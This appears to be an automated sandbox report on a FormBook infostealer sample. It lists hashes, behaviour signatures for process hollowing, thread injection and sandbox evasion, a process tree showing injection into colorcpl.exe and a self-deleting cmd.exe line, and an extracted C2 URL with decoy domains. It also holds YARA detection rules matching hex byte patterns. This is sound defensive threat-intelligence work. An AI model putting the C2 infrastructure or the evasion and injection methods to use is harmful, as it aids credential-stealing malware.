Edit tour

Windows Analysis Report
1.exe

Overview

General Information

Sample Name:	1.exe
Analysis ID:	1345564
MD5:	60ff6dcfe9ed4741b4ffb91cd3bd6895
SHA1:	89bec9456328957250b9ec8b30ec87495ab1a2e1
SHA256:	6d923f02c2252e4a2ea98a8685fc5237354e2853791855f1a451a390dd85cbb9
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

.NET source code references suspicious native API functions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

.NET source code contains potential unpacker

.NET source code contains method to dynamically call methods (often used by packers)

Queues an APC in another process (thread injection)

.NET source code contains very large array initializations

.NET source code contains very large strings

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to resolve many domain names, but no domain seems valid

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

1.exe (PID: 1892 cmdline: C:\Users\user\Desktop\1.exe MD5: 60FF6DCFE9ED4741B4FFB91CD3BD6895)

1.exe (PID: 2136 cmdline: C:\Users\user\Desktop\1.exe MD5: 60FF6DCFE9ED4741B4FFB91CD3BD6895)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

colorcpl.exe (PID: 3716 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

cmd.exe (PID: 2212 cmdline: /c del "C:\Users\user\Desktop\1.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.switchtoambitwithmirtha.com/jskg/"], "decoy": ["jajaten.com", "pnorg.net", "rccarquibogota.com", "marcomarabiamea.com", "theligue.com", "mdearpet.com", "barokahsrivillage.com", "wisdomtoothguru.com", "srteamsex.com", "erotictoybox.com", "278698.com", "victimaccidents.com", "bootyfashions.com", "stomasto.site", "canalysisconsulting.com", "printandmail.legal", "bestcureforbackpain.com", "apanifitness.com", "smartabletech.com", "facialsteamerofficial.com", "cookclassesfishes.com", "ayanmobile.com", "cannapharmaus.com", "lactationdrink.com", "enrgsystems.info", "f1leghecodemasters.net", "topazkibblez.com", "appbecause.com", "256barrington.com", "snapmoneyexchangellc.com", "kriolland.com", "7255399.com", "realoneathletics.info", "illustriousevents.com", "moonman.services", "dog2meeting.com", "successwithyolandafgreen.com", "freshlookconsulting.net", "3bcreditwatch.com", "lacroixundkress.com", "beaujolaisboston.com", "breakawayfc.com", "bollmasonry.com", "jiujitsuspa.com", "zirangaobai.com", "capitalmedicalsupplies.net", "swavhca.com", "pereiranatalia.com", "lbarco.com", "revistabrasileiramarketing.info", "carportaccessory.com", "kvrkl.com", "handledlife.com", "groups-post-sales-2678493.xyz", "rapidprintz.com", "buzzkeel.com", "divinityemerald.com", "ppc-listing.info", "coryfireshop.com", "mimipopuppicnics.com", "votehealey.com", "saraadamchak.com", "winwinwin365.net", "tprmt.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2046232928.0000000001270000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0xa085:$a2: E9 E8 61 FF FF C3 E8
00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x43085:$a2: E9 E8 61 FF FF C3 E8
00000004.00000002.4449703704.0000000004C50000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0xa085:$a2: E9 E8 61 FF FF C3 E8
00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6171:$a1: 3C 30 50 4F 53 54 74 09 40 0x1aab0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x97bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14887:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0xcf085:$a2: E9 E8 61 FF FF C3 E8
00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6171:$a1: 3C 30 50 4F 53 54 74 09 40 0x1aab0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x97bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14887:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d9b41:$a1: 3C 30 50 4F 53 54 74 09 40 0x300f61:$a1: 3C 30 50 4F 53 54 74 09 40 0x2ee480:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3158a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2dd18f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3045af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x2e8257:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x30f677:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2dbfb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2dc342:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3033d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x303762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2e8055:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x30f475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2e7b41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x30ef61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2e8157:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x30f577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2e82cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x30f6ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2dcd5a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x30417a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2e6dbc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x30e1dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2ddad2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x304ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2ed147:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x314567:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2ee1ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2ea079:$sqlite3step: 68 34 1C 7B E1 0x2ea18c:$sqlite3step: 68 34 1C 7B E1 0x311499:$sqlite3step: 68 34 1C 7B E1 0x3115ac:$sqlite3step: 68 34 1C 7B E1 0x2ea0a8:$sqlite3text: 68 38 2A 90 C5 0x2ea1cd:$sqlite3text: 68 38 2A 90 C5 0x3114c8:$sqlite3text: 68 38 2A 90 C5 0x3115ed:$sqlite3text: 68 38 2A 90 C5 0x2ea0bb:$sqlite3blob: 68 53 D8 7F 8C 0x2ea1e3:$sqlite3blob: 68 53 D8 7F 8C 0x3114db:$sqlite3blob: 68 53 D8 7F 8C 0x311603:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.2046258222.0000000001289000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1085:$a2: E9 E8 61 FF FF C3 E8
00000004.00000002.4449653470.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0xa085:$a2: E9 E8 61 FF FF C3 E8
00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6171:$a1: 3C 30 50 4F 53 54 74 09 40 0x1aab0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x97bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14887:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6171:$a1: 3C 30 50 4F 53 54 74 09 40 0x1aab0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x97bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14887:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 1.exe PID: 1892	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 1.exe PID: 1892	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x74fe7:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: 1.exe PID: 2136	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x329c7:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: colorcpl.exe PID: 3716	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xd2e13:$a1: 3C 30 50 4F 53 54 74 09 40 0x1637f6:$a1: 3C 30 50 4F 53 54 74 09 40 0x16533b:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.1.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.1.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.1.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5371:$a1: 3C 30 50 4F 53 54 74 09 40 0x19cb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x89bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x13a87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.1.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.1.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
2.2.1.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.1.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.1.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6171:$a1: 3C 30 50 4F 53 54 74 09 40 0x1aab0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x97bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14887:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.1.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.1.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0.2.1.exe.407d900.4.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.1.exe.407d900.4.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.1.exe.407d900.4.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xd5241:$a1: 3C 30 50 4F 53 54 74 09 40 0xfc661:$a1: 3C 30 50 4F 53 54 74 09 40 0xe9b80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x110fa0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xd888f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xffcaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xe3957:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x10ad77:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.1.exe.407d900.4.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xd76b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd7a42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xfead8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xfee62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe3755:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x10ab75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe3241:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x10a661:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe3857:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x10ac77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe39cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x10adef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xd845a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xff87a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xe24bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1098dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xd91d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1005f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xe8847:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x10fc67:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xe98ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.1.exe.407d900.4.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xe5779:$sqlite3step: 68 34 1C 7B E1 0xe588c:$sqlite3step: 68 34 1C 7B E1 0x10cb99:$sqlite3step: 68 34 1C 7B E1 0x10ccac:$sqlite3step: 68 34 1C 7B E1 0xe57a8:$sqlite3text: 68 38 2A 90 C5 0xe58cd:$sqlite3text: 68 38 2A 90 C5 0x10cbc8:$sqlite3text: 68 38 2A 90 C5 0x10cced:$sqlite3text: 68 38 2A 90 C5 0xe57bb:$sqlite3blob: 68 53 D8 7F 8C 0xe58e3:$sqlite3blob: 68 53 D8 7F 8C 0x10cbdb:$sqlite3blob: 68 53 D8 7F 8C 0x10cd03:$sqlite3blob: 68 53 D8 7F 8C
0.2.1.exe.3fbfe60.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.1.exe.3fbfe60.5.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.1.exe.3fbfe60.5.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x192ce1:$a1: 3C 30 50 4F 53 54 74 09 40 0x1ba101:$a1: 3C 30 50 4F 53 54 74 09 40 0x1a7620:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1cea40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x19632f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1bd74f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1a13f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x1c8817:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
